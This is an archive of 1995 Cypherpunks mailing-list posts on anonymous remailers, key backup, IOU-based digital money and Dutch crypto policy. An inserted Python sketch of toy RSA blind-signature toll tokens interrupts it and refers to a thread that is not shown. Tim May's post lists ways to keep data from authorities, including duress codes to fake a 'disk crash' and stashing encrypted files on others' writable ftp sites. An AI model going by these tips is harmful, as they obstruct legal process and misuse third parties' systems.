Timothy C. May | Crypto Anarchy: encryption, digital money,
tcmay at netcom.com | anonymous networks, digital pseudonyms, zero
| knowledge, reputations, information markets,
W.A.S.T.E.: Aptos, CA | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo at toad.com with body message of only:
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay

From hodges at roadrunner.com Fri Jan 20 22:13:13 1995
From: hodges at roadrunner.com (Master-X)
Date: Fri, 20 Jan 95 22:13:13 PST
Subject: Send Me The Stuff
Message-ID: <199501202316.XAA22586@beep.roadrunner.com>

Please e-mail me with the stuff.
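The "Smart Roads" thread above contrasts a toll plaza that logs who passed and when with a payment card that is unlinkable to driver or car. As an added illustration (not taken from any post in this archive, and not DigiCash's implementation), the sketch below uses textbook RSA blind signatures to show why the seller's records cannot be joined to the gate's records. The toy key, the account names and the gate name are constructed, and unpadded RSA at this size is for illustration only.

```python
import hashlib
import secrets
from math import gcd

# Constructed toy RSA key for the toll authority, built from two Mersenne
# primes. Far too small and too structured for real use; illustration only.
P, Q = 2**127 - 1, 2**89 - 1
N, E = P * Q, 65537
D = pow(E, -1, (P - 1) * (Q - 1))  # private exponent, held by the authority


def h(serial: bytes) -> int:
    """Map a token serial into Z_N (toy full-domain hash, no padding)."""
    return int.from_bytes(hashlib.sha256(serial).digest(), "big") % N


class TollAuthority:
    def __init__(self):
        self.issuance_log = []  # (account, blinded value): what it sees at sale
        self.gate_log = []      # (gate, serial): what it sees on the road
        self.spent = set()

    def sell_token(self, account: str, blinded: int) -> int:
        """Bill the account and sign the blinded value; the serial stays hidden."""
        self.issuance_log.append((account, blinded))
        return pow(blinded, D, N)

    def accept_at_gate(self, gate: str, serial: bytes, sig: int) -> bool:
        """Accept a token once: valid signature and not spent before."""
        if pow(sig, E, N) != h(serial) or serial in self.spent:
            return False
        self.spent.add(serial)
        self.gate_log.append((gate, serial))
        return True


def buy_token(authority: TollAuthority, account: str):
    """Driver side: blind a fresh serial, get it signed, unblind the result."""
    serial = secrets.token_bytes(16)
    while True:  # the blinding factor must be invertible mod N
        r = secrets.randbelow(N - 2) + 2
        if gcd(r, N) == 1:
            break
    blinded = (h(serial) * pow(r, E, N)) % N
    blind_sig = authority.sell_token(account, blinded)
    return serial, (blind_sig * pow(r, -1, N)) % N


def consistent_accounts(authority: TollAuthority, serial: bytes):
    """Accounts whose sale record could have produced this spent token.

    Using its private key, the authority solves blinded = h(serial) * r^E
    for r. A solution exists for every sale record, so joining the two
    logs never narrows down who drove through the gate.
    """
    m = h(serial)
    m_inv = pow(m, -1, N)
    matches = []
    for account, blinded in authority.issuance_log:
        r = pow((blinded * m_inv) % N, D, N)  # candidate blinding factor
        if (m * pow(r, E, N)) % N == blinded:
            matches.append(account)
    return matches


def demo():
    authority = TollAuthority()
    accounts = ["acct-alice", "acct-bob", "acct-carol"]  # constructed names
    tokens = {a: buy_token(authority, a) for a in accounts}
    serial, sig = tokens["acct-bob"]
    first = authority.accept_at_gate("gate-7", serial, sig)
    replay = authority.accept_at_gate("gate-7", serial, sig)
    return authority, serial, first, replay


if __name__ == "__main__":
    authority, serial, first, replay = demo()
    print("accepted:", first, "replay accepted:", replay)
    print("gate log:", [(g, s.hex()) for g, s in authority.gate_log])
    print("accounts consistent with the token:",
          consistent_accounts(authority, serial))
```

The gate log still records that some valid token passed a given gate; what disappears is the link from that record to an account or plate.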
From abostick at netcom.com Fri Jan 20 22:29:05 1995
From: abostick at netcom.com (Alan Bostick)
Date: Fri, 20 Jan 95 22:29:05 PST
Subject: Key backup
In-Reply-To: <199501182358.SAA29305@bb.hks.net>
Message-ID: <2778lyczB0I7075yn@netcom.com>

-----BEGIN PGP SIGNED MESSAGE-----

In article <199501182358.SAA29305 at bb.hks.net>, you wrote:

> Variations on this theme (there are many) are encouraged. Have a friend
> check out a library book and let you stamp your key somewhere inside. It's
> the number of possible variations that make this seemingly impossible to
> attack. Apologies if this "secret ink" stuff is way off base ;-) .
>
> Most people (myself included) would opt for the "split and
> disguise" or "hidden/buried" key schemes where secret ink wouldn't add
> much security.
> 'Adam Shostack' was reported to have written:
> > If you want to hide bits, they
> > should be stripped of low entropy parts and hidden with a stego
> > program.
>
> The idea was to use something other than magnetic media. A new and
> different optical encoding method could be devised to hide a key in a
> halftone, but the barcode example was offered as one possibility using
> an existing standard. The basis for this thread was the perceived need
> for a relatively simple key backup system that didn't require the active
> participation of a whole hoard of people.

Pat Cadigan, in her novel SYNNERS, had the off-beat idea of having crucial data encoded into graphical images and tattooed onto the skins of beach bums.

I've heard of worse ideas. . . .

                          | PROOF-READER, n: A malefactor who atones for
Alan Bostick              | making your writing nonsense by permitting
abostick at netcom.com    | the compositor to make it unintelligible.
finger for PGP public key | Ambrose Bierce, THE DEVIL'S DICTIONARY
Key fingerprint:          | 50 22 FB 46 41 A3 17 9D F7 33 FF E1 4E 1C 89 79
+legal_kludge=off

From tcmay at netcom.com Fri Jan 20 22:38:45 1995
From: tcmay at netcom.com (Timothy C. May)
Date: Fri, 20 Jan 95 22:38:45 PST
Subject: The Remailer Crisis
In-Reply-To:
Message-ID: <199501210637.WAA28437@netcom13.netcom.com>

Rhys Kyraden wrote:

> Yes, my machine has a 56k direct line in, 24 hrs. a day, 7 days a week
> (during school months!;-)) The server you just mailed to is on this
> machine.

If it's up nearly all the time (23.8 hours a day), accepting mail, then I see no reason your machine can't be a remailer. If, however, it gets turned off, taken home for the holidays, isn't always in a state to accept mail, then your remailer will get pinged and downchecked by the testing programs.

(And you won't easily be able to arrange for multiple "accounts" on the machine, given the sorry state of such things on the Mac.)

> I agree that the Mac lacks some of the more powerful Unix features, namely
> preemptive multitasking, but I also believe that, at least with the newer
> Macs, CPU time-sharing is more efficient than it used to be. Know of Chuck
> Shotton's MacHTTP WWW server for the Mac? An excellent piece of software
...

Others may know more about this means for running a remailer on a Mac. I do know that Scott Collins, a Mac programming wizard who works for Apple, chose to run his remailer on Netcom's Unix machines...he would be a person to ask about what you hope to do.

> I thought that it was in Perl. I have tried pulling Unix Perl scripts and
> running them under MacPerl, but it doesn't quite do it. In fact, it usually
> doesn't do anything but spew errors back at you.
I can't help here. Try the Perl discussion groups...there's probably a FAQ on both Perl and MacPerl that discusses incompatibilities and issues.

As an aside, maybe working on another project, one that is actually new territory, would be a more interesting and useful thing to do. With a 660AV, and the various audio tools available, a Mac version of PGP Phone might be a lot more interesting.

--Tim May

--
..........................................................................
Timothy C. May | Crypto Anarchy: encryption, digital money,
tcmay at netcom.com | anonymous networks, digital pseudonyms, zero
| knowledge, reputations, information markets,
W.A.S.T.E.: Aptos, CA | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo at toad.com with body message of only:
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay

From adam at bwh.harvard.edu Fri Jan 20 23:08:04 1995
From: adam at bwh.harvard.edu (Adam Shostack)
Date: Fri, 20 Jan 95 23:08:04 PST
Subject: Why emoney? Why not a web of debt?
In-Reply-To:
Message-ID: <199501210707.CAA29137@bwh.harvard.edu>

adamfast at seanet.com wrote:

| well, one way of doing it is LETS, the Local Exchange Trading System-- a
| non-computerized way of exchanging value in a community. it doesn't
| exactly use money. there are thousands of LETS's worldwide, i've never

LETS seem to have little use for anonymity or privacy. They may also involve substantial risks of inflation/devaluation; I'm discussing this with Michael Linton on www-buyinfo. (www-buyinfo-request at ALLEGRA.ATT.COM)

Adam

--
"It is seldom that liberty of any kind is lost all at once." -Hume

From tcmay at netcom.com Fri Jan 20 23:14:40 1995
From: tcmay at netcom.com (Timothy C. May)
Date: Fri, 20 Jan 95 23:14:40 PST
Subject: Data Vaults (vs.
Data Havens)
In-Reply-To: <2778lyczB0I7075yn@netcom.com>
Message-ID: <199501210713.XAA17754@netcom13.netcom.com>

Alan Bostick wrote:

> Pat Cadigan, in her novel SYNNERS, had the off-beat idea of having
> crucial data encoded into graphical images and tattooed onto the skins
> of beach bums.
>
> I've heard of worse ideas. . . .

She's a better novelist than an information theorist...

All the talk recently about data havens [secure storage variety] got me to thinking.

(In case you're wondering, I specified [secure storage variety] because there seems to be some confusion, or at least conflation, about what a "data haven" does. Is it for selling illegal data publicly? Is it for storing sensitive material, privately? Something else?)

Anyway, for securely storing data that one wishes to be able to later retrieve, but wishes thieves and authorities not to have, here are some major possibilities:

1. The old stand-by. Keep copies of data at a friend's house. (This is what I do, to guard against fires or thefts or ransackings by the Thought Police.)

(Knowing where the stuff is stored is part of the "key" to getting it, and only adds a few bits to the overall key length in most cases. That is, not much security against a capable adversary. But fires are usually pretty dumb, and cops not much smarter, so this works pretty well.)

2. True secure storage, using a commercial service. Mineshafts, salt domes, concrete buildings, etc. are commonly used for this. Corporate records, etc. Pay a fee, store your files, etc. Of course, a subpoena will get the data posthaste.

2A. Offshore secure storage, in a jurisdiction that will not honor subpoenas from one's country. Lots of obvious issues here: bribery of the vault, pressures applied locally, black bag jobs, etc.

3. Encryption, with either local or remote storage.

3A. Encrypted, but local. This is by far the most common scenario, the one most of us use all the time. Can the authorities force disclosure of a key?
I have a *lot* on this in my FAQ, so I won't repeat it here. Basic conclusion: has not been tested, but it is unlikely that a defendant who claims to have "forgotten" his passphrase, or who just clams up, will get zapped for this, per se.

3B. Encrypted, offshore. Actually, this is similar to the above. If the court can compel decryption, it can certainly compel retrieval of files. And if it can't compel decryption, the files are no less safe if stored locally.

(But I admit that the realities are not so simple. Offshore storage offers some additional advantages. For one, "duress codes" that the site owner in Belize that the person requesting the material, in LA, is actually under duress. The site operator can then report back a convenient "disk crash" and the authorities will be screwed. This stratagem is harder to do cleanly in the U.S., for example, where the site owner might be subpoenaed.)

4. Purloined Letter. Hide it in plain sight. Steganography, in one of your hundreds of DATs, or in GIFs and PICTs, etc. Without the key, they won't know where it is. (I've been pushing this since 1988, in postings on sci.crypt and elsewhere. Romana Machado and others have implemented the image-based version.)

5. A variant is to use ftp sites. Encrypt the data and place it in an ftp site that allows write access. Use remailers if you wish. Then, your secret data is stored in encrypted, unidentifiable form on someone else's computer, retrievable by you later.

(Lots of issues here. Our never-realized "anonymous anonymous ftp" capability could mean the storer would not even know what continent the site was on.)

Well, these are just some of the ideas. Me, I stick to simply encrypting sensitive files and keeping a couple of copies in safe places.

I don't think we ought to call these uses "data havens."
Save the term "data haven" for those places, in cyberspace or in real space, that sell access to Nazi medical experiments, that sell illegal birth control information, that buy weapons secrets, and so on.

--Tim May

--
..........................................................................
Timothy C. May | Crypto Anarchy: encryption, digital money,
tcmay at netcom.com | anonymous networks, digital pseudonyms, zero
| knowledge, reputations, information markets,
W.A.S.T.E.: Aptos, CA | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo at toad.com with body message of only:
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay

From greg at ideath.goldenbear.com Fri Jan 20 23:44:39 1995
From: greg at ideath.goldenbear.com (Greg Broiles)
Date: Fri, 20 Jan 95 23:44:39 PST
Subject: Remailers-in-a-box
In-Reply-To: <199501210301.TAA09022@netcom14.netcom.com>
Message-ID: <199501210401.AA02848@ideath.goldenbear.com>

-----BEGIN PGP SIGNED MESSAGE-----

> I don't think "disingenuous" as very apt description. For one thing,
> my proposal certainly doesn't make things any _worse_ for the true
> remailers.

Sorry if I was unclear; I didn't mean that you were being disingenuous, just that the assignment of responsibility/culpability in at least some of the schemes being discussed looks suspect to me.

I do think that this plan can create greater risk for the owners of machines which operate remailers - what if one of their customers decides not to block traffic to whitehouse.gov, or to alt.religion.copyright, or whatever? Neither the SPA nor the Secret Service has acted particularly cluefully with respect to seizing hardware or conducting unannounced destructive "fishing" expeditions.

As things stand today, I have some control (via my filter list) of the risks I'm willing to assume and not assume.
If I let people with no real stake in the matter gamble with my machine based on their own choices about filtering, that looks like a loss to me.

(Of course, the machine owner can always, via contract, set certain terms - e.g., addresses which must be filtered. This starts to look like active participation in the administration of the remailer, which makes the off-site operator structure seem less legitimate.)

From nowhere at bsu-cs.bsu.edu Sat Jan 21 00:09:44 1995
From: nowhere at bsu-cs.bsu.edu (Anonymous)
Date: Sat, 21 Jan 95 00:09:44 PST
Subject: Why emoney? Why not a web of debt?
Message-ID: <199501210809.DAA12896@bsu-cs.bsu.edu>

> Date: Fri, 20 Jan 1995 19:36:34 -0500
> From: jrochkin at cs.oberlin.edu (Jonathan Rochkind)
>
> Certainly, that's what money is after all. Pretty much. But how are you
> going to transfer these IOUs electronically in a way that is relatively
> fraud-proof? [...]

By only trading with trusted partners. Read on...

> And of course, if you want to use these certificates of value anonymously,
> which is what is required to pay for an anon remailer, there are some
> slightly more stringent requirements. The right kind of ecash protocol can
> still handle it. But Carol probably shouldn't be paying for a remailer in
> CarolBucks (or CarolIOUs, whatever), at least not unless Carol is such a
> big spender that CarolBucks are in wide circulation and used by lots of
> people other than Carol. Which I guess is possible in your system.

If the remailer operator trusts Carol, then Carol and the Op can exchange Op-IOU's for money, or Carol-IOU's for Op-IOU's. (This is the base case of the induction for you math geeks.)
Carol can use the Op-IOU's directly with the Op or 'sell' them to people who want to do business with the Op.

If the remailer operator doesn't trust Carol, but there is a chain of trust from Carol to the remailer operator, then Carol can get IOUs from someone which the remailer operator does trust. Call them Jo-IOUs.

To do this Carol asks Pat who asks ... who asks Jo for an IOU worth $32. Carol gives Pat a Carol-IOU worth $32 (+transaction fee if Pat is a greedy soul) in exchange for which Pat gives Carol the Jo-IOU worth $32 (which Carol got from Pat (which Pat got from some place only Pat knows for sure)).

IOU swaps will probably be done under the cover of encryption. Swaps can also be done with a nice ecash system like Chaum and Brandt(sp?) have proposed. But I am not sure it is required.

Anonymity can come also from the chain of IOU swaps, in the same way remailers produce anonymity -- each person neglects to tell any others for whom they carry out IOU swaps. Sure Pat knows Carol wants a Jo IOU, but Pat doesn't know why. Jo could figure out that Jo's IOU went out to W.Smith, and came back from V.Jones but can't make any conclusion about whether W. and V. are trading partners or not.

It would take a conspiracy of each person along the swap path to expose the real trade. Alternatively the buyer or seller can out the transaction. (But suppose they only know each other via some anonymous email pool...)

And privacy (from other than your trading partners) comes from using encryption during each IOU swap. But if you don't trust your trading partners enough to keep quiet about who you are, by all means use an untraceable ecash system. (There are other advantages to using blind signatures anyway.)

> A pseudo-anarchist non-state-supported debt system would work fine, but you
> still need a mechanism to transfer your certificates of value, whether they

Well... TackyTokens, and a little bit (ha!) of client code (start with Sameer's?) ought to do the trick.
(So perhaps the original message's subject ought to have been "Why Ebanks? Why not a web of debt-trust?" since it is the central bank I am avoiding here. Not tacky tokens.) But it isn't really necessary. Read on...

> [...] There are advantages and disadvantages to that
> sort of thing, and it might be something interesting to think about, but

One problem with getting an ecash system off the ground is making the tokens worth money. The advantage of a distributed web-of-debt/trust model is that I only need to trade IOUs for US$ with a few trusted friends. I don't need to go to any kind of central bank. No central bank means no central point to be attacked with guns, hacks, or taxes. No central bank means no credit card numbers, money orders, or green backs mailed away to strangers.

Another cool thing, and the reason you don't need Chaumian digital cash, is that the only people you can steal from (or who can steal from you) are your trusted friends! If I pass a bogus token in exchange for a real IOU, then I just ripped off my friend. The only place two non-friends interface is at the final buyer-seller interface. If the seller refuses to honor the token, the buyer can ask the friend who gave it to them for a refund, who can ask for a refund from ... until the token gets back to the thief. The thief can either steal from their friend by refusing the refund, or in fact honor the bogus token, and eat the loss (if any).

One bad thing is anyone can deny service to people by passing bogus tokens, and then refunding them. Luckily the friends of the blocker will notice that when getting tokens through that person, the number of refunds is higher than average. In that case, the blocker can be removed from lists of their friends, and cut out of the economy.

Denial of service can be prevented another way too -- but it does require Chaumian blind signatures.
Instead of trading a Carol-IOU for any old Jo-IOU, Carol might demand a Jo-IOU which is a signature on a particular (blinded) secret number. Just as if Carol were doing a TackyToken protocol exchange directly with Jo. If Carol gets a thing from Pat which isn't signed by Jo, Carol complains to Pat. If Carol gets a thing which un-blinded isn't a signature by Jo of Carol's secret number, Carol again complains to Pat.

Symbolically: instead of a <-> b, then b <-> c, then ... y <-> z; do a -> via b -> via c ... via y -> z signs -> via y ... via b -> to a.

The disadvantage is that Pr0duct Cypher's Tacky Token code would need to be hacked a bit more. And then there is the nasty old issue of algorithm patents.

Noyb

From skaplin at mirage.skypoint.com Sat Jan 21 00:36:26 1995
From: skaplin at mirage.skypoint.com (Samuel Kaplin)
Date: Sat, 21 Jan 95 00:36:26 PST
Subject: Remailer In a Box available for beta testing
In-Reply-To: <199501210142.RAA28133@soda.CSUA.Berkeley.EDU>
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

In article <199501210142.RAA28133 at soda.CSUA.Berkeley.EDU>, you wrote:

> (Sameer uses PGP)
> 3) If you wish, you can setup a .forward file to point to mailfilters
> or to another account.
>
> 4) Run the program /usr/local/lib/boxed-remailer/install_remail. The
> remailer will be installed, and non-remailed mail will be acted upon
> according to how the account was setup before you ran the program.
>
> 5) Answer the questions, they should be pretty simple.
>
> Once an account is created there is a one week free grace period.
> If you'd like to continue the account you can pay for it.
>
> If you have problems and suggestions, make sure you mail me, and
> I'll fix it. This is still in beta testing, so if you have problems I won't
> disable the account waiting for payment until the problems are fixed.
>

One minor question, is it possible to set it up so that it is not a final hop remailer.
In other words the remailer is set up to pass its mail on to another remailer which is the final destination (preferably non-U.S.) If so, I'm in. I've already got my account on c2 doing three things, what's one more.

If we could make this possible, it could really propagate remailers as it removes some of the liability from those who can't afford it. I would love to run a final hop remailer, unfortunately financially I barely have enough cash to keep on the net, let alone pay for a lawyer if needed. Hopefully this is only temporary, (wifey finally found a job, now it's catch-up time) but I'm unfortunately getting used to it.

Sam

- --
==============================================================================
skaplin at skypoint.com                 | Finger skaplin at infinity.c2.org for
                                         | a listing of crypto related files
PGP encrypted mail is accepted and       | available on my auto-responder.
preferred.                               | (Yes...the faqs are there!)
                                         |
E-mail key at four11.com for PGP Key or  | "...vidi vici veni" - Overheard
Finger skaplin at mirage.skypoint.com    | outside a Roman brothel.
==============================================================================
Any two philosophers can tell each other all they know in two hours.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
-----END PGP SIGNATURE-----

From usura at vox.xs4all.nl Sat Jan 21 03:02:59 1995
From: usura at vox.xs4all.nl (Alex de Joode)
Date: Sat, 21 Jan 95 03:02:59 PST
Subject: The Remailer Crisis
Message-ID:

jalicqui at prairienet.org (Jeff Licquia) writes:

: Would it be better if you didn't have to dedicate your box to Linux, but
: just ran it every so often when you weren't playing with Codewright? If you
: had some store-and-forward mail system (like UUCP or Fido), you wouldn't
: need to say goodbye to DOS/Windows.

Patrick Oonk has written a remailer for Waffle, (which is a UUCP system), I use that for vox.xs4ll.nl . It works under DOS.

Regards,

Alex de Joode usura at replay.com http://xs4all.nl/~usura

From carolb at barton.spring.com Sat Jan 21 03:12:26 1995
From: carolb at barton.spring.com (Censored Girls Anonymous)
Date: Sat, 21 Jan 95 03:12:26 PST
Subject: [pagre@weber.ucsd.edu: Supreme Court decision on anonymity]
In-Reply-To: <9501181647.AA13819@toast>
Message-ID:

Thanks for the enlightening article. Whenever I start the remailer, now, I won't be so afraid.

Love Always,

Carol Anne

ps It too will be on a c2.org type www page type format.

Registered BEllcore Trusted Software Integrity system programmer
***********************************************************************
Carol Anne Braddock "Give me your Tired, your Poor, your old PC's..."
The TS NET REVOKED PGP KEY NO.0C91594D
carolb at spring.com carolann at mm.com
************************************************************************
COMING SOON TO AN INTERNET NEWSGROUP NEAR YOU...............CENSORED.COM

From usura at replay.com Sat Jan 21 03:52:49 1995
From: usura at replay.com (Alex de Joode)
Date: Sat, 21 Jan 95 03:52:49 PST
Subject: Netherlands crypto ban?
Message-ID: <199501211152.AA05246@xs1.xs4all.nl>

In article you stated:

: What's the update on the move to ban private crypto in Holland?
: Last I remember there were trial balloons, but nothing happened.

The proposed ban came from the former fundamentalist christian led department of justice. Since the elections the political landscape has been changed, the christian democratic party has been removed, we now have Liberals (something like Republicans in the US :) ), Socialists and Social Democrats in power.

Law Enforcement has come under public scrutiny, since special police teams used unlawful tactics to get criminal organizations out of their business. They broke into Warehouses to see if narcotics were deposited there (without a warrant), they made up reports and lied in court.

The new head of the justice department, already has dropped some policies that were in place, and she just announced that due to the rise in competence of the LEA the rights a suspect has also have to be raised in order to compensate it. She swiftly killed off any opposition the LEA had against that proposal.

In my opinion, The Netherlands will not adopt a crypto policy on their own, they'll do it if the EC proposes such a "thing".

--
Alex de Joode usura at replay.com       Hate mail appreciated,
http://www.xs4all.nl/~usura             weekly contest for best death threat.
From carolb at barton.spring.com Sat Jan 21 04:07:47 1995
From: carolb at barton.spring.com (Censored Girls Anonymous)
Date: Sat, 21 Jan 95 04:07:47 PST
Subject: Linux Remailer Volunteer (Re:The remailer crisis)
In-Reply-To: <199501191847.KAA28985@netcom15.netcom.com>
Message-ID:

Volunteering

As the Tired, Poor, Project gets its next machines ready for their next recipients, I will be able to finally upgrade to a 386, and pass this 8088, to the next recipient down the line. (yeah!) I would volunteer to be your pre-alpha tester. I know that if I could run it anybody could be taught to run it. For I would always be grateful in learning how it was done in the first place, and will always help those farther down the line than me.